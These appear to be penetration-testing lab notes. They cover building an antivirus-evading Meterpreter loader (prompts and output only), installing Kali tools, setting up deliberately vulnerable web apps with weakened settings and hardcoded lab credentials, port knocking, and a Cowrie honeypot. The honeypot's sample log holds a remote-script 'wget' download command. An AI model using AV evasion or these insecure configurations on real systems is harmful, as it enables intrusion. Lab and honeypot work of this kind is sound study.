FUD (Fully Undetectable) Payload with CUSTOM-meterpreter

At the time of writing, TrendMicro did not flag this payload. Treat that as a snapshot, not a property of the binary: AV signatures update continuously, so re-scan a freshly built payload.exe before relying on it.
# apt-get install mingw-w64
# cd /root
    Automatic C source code generator – FOR METASPLOIT
           Based on rsmudge metasploit-loader
Metasploit server IP :
Metasploit port number : 4444
(+) Compiling binary ..
-rw-r--r-- 1 root root 2180 Feb 27 00:50 temp.c
(+) -rwxr-xr-x 1 root root 13312 Feb 27 00:50 payload.exe

Installing FireFox on Debian

# echo "deb http://mozilla.debian.net/ jessie-backports firefox-release" >> /etc/apt/sources.list.d/mozilla-firefox.list
# cat /etc/apt/preferences.d/mozilla-firefox
Package: *
Pin: origin mozilla.debian.net
Pin-Priority: 501

# apt-get update
# apt-cache policy firefox
  Installed: 51.0.1-3
  Candidate: 51.0.1-3
  Version table:
 *** 51.0.1-3 1001
       1001 http://mirrordirector.archive.parrotsec.org/parrot stable/main amd64 Packages
        100 /var/lib/dpkg/status
     51.0.1-3~bpo80+1 501
        501 http://mozilla.debian.net jessie-backports/firefox-release amd64 Packages

# apt-get install firefox -y
-read the version table before trusting the pin: here the Parrot mirror sits at priority 1001, so its 51.0.1-3 beats the jessie-backports build at 501 and apt simply keeps the installed package. On plain Debian jessie, where no other firefox package exists, 501 is enough to pull from mozilla.debian.net; to make the backport win over a distro package, raise Pin-Priority above that package's priority.

Installing Kali tools on Debian

We need katoolin for that purpose. Katoolin works by adding the Kali repositories to a non-Kali Debian base; that mixes two package sets and can break the system on a later upgrade, so remove the repositories again (option 3 under "Add Kali repositories & Update") once the tools you want are installed.

# cd /root
# cd katoolin
# ln -s katoolin.py katoolin
# chmod +x katoolin
# ./katoolin
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 1
1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 1

1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 2

1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> back

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 2

1) Information Gathering                        8) Exploitation Tools
2) Vulnerability Analysis                       9) Forensics Tools
3) Wireless Attacks                             10) Stress Testing
4) Web Applications                             11) Password Attacks
5) Sniffing & Spoofing                          12) Reverse Engineering
6) Maintaining Access                           13) Hardware Hacking
7) Reporting Tools                              14) Extra
0) All
Select a category or press (0) to install all Kali linux tools .
kat > 0
Do you want to continue? [Y/n]

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 3
Do you want to install classicmenu indicator ? [y/n]> y

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 4
Do you want to install Kali menu ? [y/n]> y

Installing RDP Server on Linux

This example uses Debian 8, but the same steps work on other Linux distributions.

-install xrdp server and xfce desktop
# apt-get install xrdp xfce4 -y

-enable xrdp on every reboot
# systemctl enable xrdp.service
# systemctl restart xrdp.service

-enable xfce on every rdp connection
# echo "xfce4-session" > /root/.xsession
# echo "xfce4-session" >> /etc/xrdp/startwm.sh
-~/.xsession is per user: create it for every account that will log in over RDP. xrdp listens on 3389/tcp with plain password authentication and no lockout, so keep it reachable only from the lab network.

Installing Vulnerable bWAPP, DVWA, Joomla, Mutillidae2, SQLi-Labs, XAMPP, WordPress on TurnKey LAMP

Download and install TurnKey LAMP ova from
set VBox Settings/Display/Screen/Video Memory to 6MB
set NIC1 to Bridged in VBox
Set NIC2 to Host only
click Advanced Menu
select Networking, click Select
Set eth0 to dhcp and eth1 to static
-the bridged eth0 exists so the VM can fetch packages; everything installed below is deliberately exploitable, so once setup is done keep only the host-only NIC attached, or at least never leave the bridged one on a network you do not own


# cd /root
# apt list --installed
find the apache and mysql package names there
# service mysql stop
# apt-get purge mysql-server mysql-client mysql-common
# apache2ctl stop
# apt-get purge apache2 apache2-utils apache2.2-bin
# apt-get autoremove

# apt-get autoclean

-download xampp
# chmod 755 xampp-linux-x64-5.6.30-0-installer.run
# ./xampp-linux-x64-5.6.30-0-installer.run
Welcome to the XAMPP Setup Wizard.
Select the components you want to install; clear the components you do not want
to install. Click Next when you are ready to continue.
   XAMPP Core Files : Y (Cannot be edited)
   XAMPP Developer Files [Y/n] :
   Is the selection above correct? [Y/n]:
Installation Directory
   XAMPP will be installed to /opt/lampp
   Press [Enter] to continue:
Setup is now ready to begin installing XAMPP on your computer.

   Do you want to continue? [Y/n]:

# cd /opt/lampp
-the default "Require local" in httpd-xampp.conf limits the XAMPP dashboard and phpMyAdmin to the VM itself; this opens them to every network the VM sits on, acceptable only because the whole VM is a throwaway lab target
# sed -i 's/Require local/Require all granted/' etc/extra/httpd-xampp.conf
# ./lampp start
-to restart apache only
# /opt/lampp/bin/apachectl restart

-the apache document root is /opt/lampp/htdocs
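A less permissive alternative to the sed above, added here as an example (it is not from XAMPP or from the original notes): keep XAMPP's own LocationMatch stanza from etc/extra/httpd-xampp.conf and add a Require ip for the host-only subnet instead of opening the dashboard and phpMyAdmin to every network. 192.168.56.0/24 is VirtualBox's default host-only range and is an assumption; adjust it to yours. Apache 2.4 treats several Require lines in one block as "any of these", so access from the VM itself keeps working.

```apacheconf
# /opt/lampp/etc/extra/httpd-xampp.conf (added example, not XAMPP's shipped text)
# Weak setting the notes above produce:
#     Require all granted
# Restricted version: local plus the host-only subnet only.
<LocationMatch "^/(?i:(?:xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))">
    Require local
    Require ip 192.168.56.0/24
    ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
</LocationMatch>
```

After editing, `/opt/lampp/bin/apachectl configtest` then `/opt/lampp/bin/apachectl restart`; a request from the bridged network should now get the XAMPP 403 page while the host-only address still reaches /phpmyadmin.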

bWAPP (Buggy Web Application)
# cd /root
# mkdir -p /opt/lampp/htdocs/bwapp
-the SourceForge download of bWAPP_latest.zip is saved under the name "download?source=files"
# mv 'download?source=files' /opt/lampp/htdocs/bwapp/bwapp.zip
# cd /opt/lampp/htdocs/bwapp
# unzip bwapp.zip
# rm bwapp.zip
# vi bWAPP/admin/settings.php
set this part

$db_password = "";

# cd bWAPP
# chmod 777 documents images passwords
-open your browser and go to
click on here
L: bee
P: bug


-download dvwa
# cd /root
# mv DVWA /opt/lampp/htdocs/dvwa
# cd /opt/lampp/htdocs/dvwa
# chmod 777 hackable/uploads
# chown root:root hackable/uploads
# chmod 666 external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
-XAMPP's httpd runs as the daemon user, so the upload directory needs world write and execute and the PHPIDS log world write, which is what DVWA's own setup notes ask for; 766 on a directory denies traversal to everyone but root, and uploads then fail
with your gmail account
click Continue
click Get reCAPTCHA
on Label and Domains type your domain i.e: domain.com
click Register
You will get Site and Secret key
# cd /opt/lampp/htdocs/dvwa/config
# cp -p config.inc.php config.inc.php.bak
# vi config.inc.php
-set your mysql root password
$_DVWA[ 'db_password' ] = 'Passw0rd';
-insert Site > public key and Secret > private key into this part (the keys below are the ones registered for this lab; use your own)
$_DVWA[ 'recaptcha_public_key' ]  = '6LdaMRYUAAAAAGH_Wjgn15xUmdcXTMP9YpBJ7y3n1';

$_DVWA[ 'recaptcha_private_key' ] = '6LdaMRYUAAAAALsTFuYgrGbeozX2efE3EOz11T5x1';

Set "allow_url_include = On"
# sed -i s/’allow_url_include=Off’/’allow_url_include=On’/ /opt/lampp/etc/php.ini
# /opt/lampp/bin/apachectl restart
go to
click Create/Reset Database
go to
L: admin

P: password

# cd /root
# mv joomla_3-6-5-stable-full_package-zip\?format\=zip joomla-3.6.5.zip
# unzip joomla-3.6.5.zip -d joomla
# mv joomla /opt/lampp/htdocs
# cd /opt/lampp
# sed -i 's/display_errors=On/display_errors=Off/' etc/php.ini
# sed -i 's/output_buffering=4096/output_buffering=Off/' etc/php.ini
# cd /opt/lampp/htdocs/joomla/
# cp installation/model/configuration.php .
# chmod 777 configuration.php
# /opt/lampp/bin/apachectl restart
go to
Select Language: English (United States)
Site Name: joomla
Site Offline: Yes
Administrator Email: admin@gmail.com
Administrator Username: root
Administrator Password:
Confirm Administrator Password:
click Next
Database Type: MySQLi
Host Name: localhost
Username: root
Database Name: joomla
Table Prefix: j00mla_
Old Database Process: Backup
click Next
click Next
Install Sample Data: Learn Joomla English (GB) Sample Data
Email Configuration: No
click Install
click Remove installation folder
if you got error
# cd /opt/lampp/htdocs/joomla
# rm -rf installation
# chmod 644 configuration.php
go to
L: root


NOWASP Mutillidae 2
# cd /root
# apt-get install software-properties-common python-software-properties php5-curl -y
# mv download\?source\=files mutillidae.zip
# unzip mutillidae.zip
# mv mutillidae /opt/lampp/htdocs/
# cd /opt/lampp/htdocs/mutillidae
# vi classes/MySQLHandler.php
set your MySQL password here
        static public $mMySQLDatabasePassword = "";
-only allow access from your network
# vi .htaccess
Allow from
# /opt/lampp/bin/apachectl restart
go to
click setup/reset the DB
click OK


# cd /root
# unzip master.zip
# mv sqli-labs-master /opt/lampp/htdocs/sqli
# cd /opt/lampp/htdocs/sqli
# vi sql-connections/db-creds.inc
set mysql password i.e.
$dbpass = '';
open browser and go to
click Setup/reset Database for labs


-because TurnKey LAMP does not ship the gcc needed to compile the pcre lib, build it on another (Ubuntu) server.
After compiling, copy the lib into TurnKey LAMP
download pcre
# cd /root
# tar xf pcre-8.40.tar
# cd pcre-8.40
# ./configure --prefix=/tmp --enable-utf8 --enable-unicode-properties ; make ; make install
# cd /tmp
# tar cf lib.tar lib

# scp lib.tar root@

-on TurnKey, extract lib.tar and copy the libraries into /opt/lampp/lib (back that directory up first, this overwrites XAMPP's own libpcre)
# cd /tmp
# tar xf lib.tar
# cd /opt/lampp/lib
# cp /tmp/lib/* .

-create empty wordpress db
go to
click New on top left
Create database: wordpress

click Create

# mv WordPress /opt/lampp/htdocs/
# cd /opt/lampp/htdocs
# mv WordPress wordpress
# cd /opt/lampp/htdocs/wordpress
go to

click Let’s go!

Database Name: wordpress
Username: root
Password: Passw0rd
Database Host: localhost
Table Prefix: wp_
click Submit
You will get the warning "Sorry, but I can't write the wp-config.php file".
Paste the content shown into wp-config.php
# vi wp-config.php

click  “Run the install”

Information needed
Site Title: wordpress
Username: root
Password: Passw0rd
Your Email:
Search Engine Visibility:
click Install WordPress

-you can go to for admin purposes

Create xampp startup script
# cat /etc/init.d/lampp
#! /bin/sh
### BEGIN INIT INFO
# Provides:             xampp
# Required-Start:       $remote_fs $syslog
# Required-Stop:        $remote_fs $syslog
# Default-Start:        2 3 4 5
# Default-Stop:         0 1 6
# Short-Description: Execute the xampp command.
# Description:
### END INIT INFO
case "$1" in
    start)
        /opt/lampp/lampp start
        ;;
    restart)
        /opt/lampp/lampp restart
        ;;
    stop)
        /opt/lampp/lampp stop
        ;;
    status)
        /opt/lampp/lampp status
        ;;
    *)
        echo "Usage: $0 start|stop|restart|status"
        exit 1
        ;;
esac
-the BEGIN/END INIT INFO block is what insserv and systemd's sysv generator read; without it the script is enabled but never ordered into a runlevel

# chmod 755 /etc/init.d/lampp
# insserv -d /etc/init.d/lampp
# systemctl enable lampp

Port Knocking

By using port knocking, the SSH port stays closed to everyone and is opened (or closed again) only for a source address that sends the right sequence of connection attempts.

VM: KALI2 (Server) KALI2 (Client)

KALI2 (Server)
# apt-get install knockd -y
# cat /etc/default/knockd
-the file's contents did not survive on this page; the setting that matters is START_KNOCKD=1, because Debian ships START_KNOCKD=0 and the init script then exits without starting the daemon

# cat /etc/knockd.conf
[options]
        Interface = eth1
#change eth1 accordingly
[openSSH]
        sequence    = 7000,8000,9000
        seq_timeout = 5
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn
[closeSSH]
        sequence    = 9000,8000,7000
        seq_timeout = 5
        command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn
-the bracketed [options], [openSSH] and [closeSSH] headers are mandatory; knockd will not parse the file without them, and the door names are what show up in syslog when a sequence completes

# iptables -A INPUT -i lo -j ACCEPT
# iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# iptables -A INPUT -p tcp --dport 22 -j REJECT
# iptables -S
-rule order matters: knockd opens with -I (insert at the top of INPUT), so the per-IP ACCEPT lands ahead of the REJECT; the ESTABLISHED rule keeps an SSH session alive after the close knock, which only blocks new connections
# mkdir /etc/iptables
# iptables-save > /etc/iptables/rules.v4
# iptables-restore < /etc/iptables/rules.v4
-these files are not reloaded at boot by themselves; install iptables-persistent (it reads exactly these two paths) or restore them from a startup script
-if using ip6
# ip6tables-save > /etc/iptables/rules.v6
# ip6tables-restore < /etc/iptables/rules.v6
# service knockd start

KALI2 (Client)
-nmap shows the ssh port as filtered: the REJECT rule answers with an ICMP port-unreachable, which nmap reports as filtered and the ssh client as "connection refused"
# nmap
22/tcp filtered ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds

# apt-get install knockd -y
# ssh root@
connection refused
# knock 7000 8000 9000
# ssh root@
connection successful
# knock 9000 8000 7000
# ssh root@
connection refused
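To make the two doors above concrete, here is a small model of how knockd matches a sequence, written for this page (it is not knockd's own code). It loads the openSSH and closeSSH doors from the knockd.conf above, replays a constructed list of SYN events standing in for what the sniffer sees, and returns the iptables commands that would fire. It shows the three outcomes that matter in practice: a knock to a port outside every sequence is never seen at all (knockd's capture filter only passes the knock ports), a wrong port discards the attempt, and a sequence slower than seq_timeout is dropped by the timer so its last knock starts a fresh attempt instead.

```python
#!/usr/bin/env python3
"""Model of knockd's per-source sequence matching (added illustration).

Not knockd's code: a simplified state machine with one in-progress attempt
per source address, fed with constructed SYN events (not a real capture).
"""
from dataclasses import dataclass


@dataclass
class Door:
    name: str
    sequence: list          # knock ports, in order
    seq_timeout: float      # seconds allowed for the whole sequence
    command: str            # run on completion; %IP% is substituted


@dataclass
class Attempt:
    door: Door
    stage: int              # index of the next port expected
    started: float          # time of the first knock


# The two doors from the knockd.conf in the notes above.
OPEN_SSH = Door("openSSH", [7000, 8000, 9000], 5,
                "/sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT")
CLOSE_SSH = Door("closeSSH", [9000, 8000, 7000], 5,
                 "/sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT")


class KnockDaemon:
    def __init__(self, doors):
        self.doors = list(doors)
        self.knock_ports = {p for d in self.doors for p in d.sequence}
        self.attempts = {}   # src_ip -> Attempt

    def syn(self, ts, src_ip, dport):
        """Feed one TCP SYN; return the command to execute, or None."""
        if dport not in self.knock_ports:
            return None      # knockd's pcap filter never delivers these
        attempt = self.attempts.get(src_ip)
        if attempt and ts - attempt.started > attempt.door.seq_timeout:
            del self.attempts[src_ip]       # too slow: the timer dropped it
            attempt = None
        if attempt is None:
            # A fresh attempt must hit the first port of some door.
            for door in self.doors:
                if door.sequence[0] == dport:
                    attempt = Attempt(door, 0, ts)
                    self.attempts[src_ip] = attempt
                    break
            else:
                return None
        elif attempt.door.sequence[attempt.stage] != dport:
            del self.attempts[src_ip]       # wrong port: attempt discarded
            return None
        attempt.stage += 1
        if attempt.stage == len(attempt.door.sequence):
            del self.attempts[src_ip]
            return attempt.door.command.replace("%IP%", src_ip)
        return None


def replay(events, doors=(OPEN_SSH, CLOSE_SSH)):
    """Run (ts, src_ip, dport) SYNs through the daemon; return fired commands."""
    kd = KnockDaemon(doors)
    return [cmd for cmd in (kd.syn(*ev) for ev in events) if cmd]


# Constructed sample traffic; addresses are VirtualBox host-only defaults.
SAMPLE = [
    (0.0, "192.168.56.10", 7000),    # correct open sequence, fast
    (0.5, "192.168.56.10", 8000),
    (1.0, "192.168.56.10", 9000),
    (10.0, "192.168.56.20", 7000),   # wrong middle port: discarded
    (10.5, "192.168.56.20", 9000),
    (11.0, "192.168.56.20", 8000),
    (20.0, "192.168.56.30", 7000),   # last knock lands after seq_timeout
    (22.0, "192.168.56.30", 8000),
    (26.1, "192.168.56.30", 9000),
    (30.0, "192.168.56.10", 9000),   # close sequence from the first host
    (30.2, "192.168.56.10", 8000),
    (30.4, "192.168.56.10", 7000),
]

if __name__ == "__main__":
    for cmd in replay(SAMPLE):
        print(cmd)
```

Only 192.168.56.10 ever triggers a command, once to open and once to close; the late 9000 from 192.168.56.30 starts a closeSSH attempt that never completes. Running the real thing with `knockd -D -i eth1` prints the same stage transitions, which is the quickest way to debug a sequence that "does nothing".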

Cowrie SSH Honeypot

# cd /root
-move the real sshd to 2222 so that cowrie can take port 22: one Port line only, since leaving Port 22 in place as well makes sshd and cowrie contend for the same socket. Open a second session on 2222 before closing the one you are in.
# vi /etc/ssh/sshd_config
Port 2222
# service ssh reload

# apt-get install git python-dev python-openssl openssh-server python-pyasn1 python-twisted python-virtualenv authbind
-python-virtualenv provides the virtualenv command used below

# adduser --disabled-password cowrie
Adding user `cowrie’ …
Adding new group `cowrie’ (1002) …
Adding new user `cowrie’ (1002) with group `cowrie’ …
Changing the user information for cowrie
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
# touch /etc/authbind/byport/22
# chown cowrie:cowrie /etc/authbind/byport/22 && chmod 770 /etc/authbind/byport/22
-authbind only checks that the calling user may execute this file; 770 is what the cowrie docs use, and 777 would let any local user bind port 22

# su - cowrie
$ cd cowrie
$ virtualenv cowrie-env
Running virtualenv with interpreter /usr/bin/python2
New python executable in /home/cowrie/cowrie/cowrie-env/bin/python2
Also creating executable in /home/cowrie/cowrie/cowrie-env/bin/python
Installing setuptools, pkg_resources, pip, wheel…done.

$ source cowrie-env/bin/activate
(cowrie-env) $ pip install pycrypto
(cowrie-env) $ pip install -r requirements.txt
-pycrypto already provides the Crypto module; installing a separate "Crypto" package from PyPI pulls in whatever happens to own that name, which is not what cowrie imports
$ cp cowrie.cfg.dist cowrie.cfg
$ pico cowrie.cfg
hostname = svr01
listen_port = 22
$ cd data
$ ssh-keygen -t dsa -b 1024 -f ssh_host_dsa_key
$ cd ..
$ export PYTHONPATH=/home/cowrie/cowrie
$ pico start.sh
-in the cowrie versions that ship start.sh, set VIRTUALENV_ENABLED=yes (the virtualenv created above) and AUTHBIND_ENABLED=yes so the unprivileged cowrie user can bind port 22
$ ./start.sh

-to start cowrie using the root account: still to be worked out. Cowrie's start script refuses to run as root by design, and the authbind setup above is the supported way to serve port 22 from the unprivileged cowrie user.

-to stop cowrie
# /home/cowrie/cowrie/stop.sh
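Once the honeypot is up, the first questions are which credentials were tried, which got in, and what the attacker typed. The script below, added here as an example and not part of Cowrie, answers them from Cowrie's JSON output (log/cowrie.json when [output_jsonlog] is enabled in cowrie.cfg). Each line there is one JSON object with an "eventid" plus, depending on the event, src_ip, username, password, session and input. SAMPLE_LOG is constructed to mimic that format, with documentation-range addresses, and includes a corrupt line because a honeypot log must never take the analysis down with it.

```python
#!/usr/bin/env python3
"""Summarise Cowrie JSON log lines (added example; not Cowrie's own code).

SAMPLE_LOG is constructed to look like Cowrie's JSON output and is not a
real capture.
"""
import json
from collections import Counter, defaultdict

SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "src_port": 51234, "dst_port": 22, "session": "a1", "timestamp": "2017-02-27T00:50:01.000000Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.7", "session": "a1"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "admin", "src_ip": "203.0.113.7", "session": "a1"}
{"eventid": "cowrie.login.success", "username": "root", "password": "password", "src_ip": "203.0.113.7", "session": "a1"}
{"eventid": "cowrie.command.input", "input": "uname -a", "src_ip": "203.0.113.7", "session": "a1"}
{"eventid": "cowrie.command.input", "input": "wget http://198.51.100.9/x.sh", "src_ip": "203.0.113.7", "session": "a1"}
{"eventid": "cowrie.session.closed", "src_ip": "203.0.113.7", "session": "a1"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.23", "src_port": 40022, "dst_port": 22, "session": "b2"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "123456", "src_ip": "198.51.100.23", "session": "b2"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "198.51.100.23", "session": "b2"}
this line is truncated garbage and must not abort the run
"""


def summarise(lines):
    """Walk JSON log lines; return session sources, credential counts,
    successful credentials, commands per session and the unparseable count."""
    sources = Counter()
    credentials = Counter()
    successes = Counter()
    commands = defaultdict(list)
    skipped = 0
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except ValueError:
            skipped += 1            # count corrupt lines, never crash on them
            continue
        eid = ev.get("eventid", "")
        if eid == "cowrie.session.connect":
            sources[ev.get("src_ip")] += 1
        elif eid in ("cowrie.login.failed", "cowrie.login.success"):
            pair = (ev.get("username"), ev.get("password"))
            credentials[pair] += 1
            if eid == "cowrie.login.success":
                successes[pair] += 1
        elif eid == "cowrie.command.input":
            commands[ev.get("session")].append(ev.get("input"))
    return {"sources": sources, "credentials": credentials,
            "successes": successes, "commands": dict(commands),
            "skipped": skipped}


def report(summary, top=5):
    """Render the summary as text lines; returned so the caller decides where they go."""
    out = ["sessions by source:"]
    out += ["  %s  %d" % (ip, n) for ip, n in summary["sources"].most_common(top)]
    out.append("credentials tried:")
    out += ["  %s:%s  %d" % (u, p, n) for (u, p), n in summary["credentials"].most_common(top)]
    out.append("credentials that got in:")
    out += ["  %s:%s" % (u, p) for (u, p) in summary["successes"]]
    out.append("commands by session:")
    for sess, cmds in summary["commands"].items():
        out += ["  %s> %s" % (sess, c) for c in cmds]
    out.append("unparseable lines: %d" % summary["skipped"])
    return out


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:       # e.g. /home/cowrie/cowrie/log/cowrie.json
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LOG.splitlines()
    print("\n".join(report(summarise(lines))))
```

Run it against the live log with `python3 summarise.py /home/cowrie/cowrie/log/cowrie.json`. Keying on eventid rather than on message text is deliberate: Cowrie's human-readable messages change between versions, the event identifiers are the stable contract.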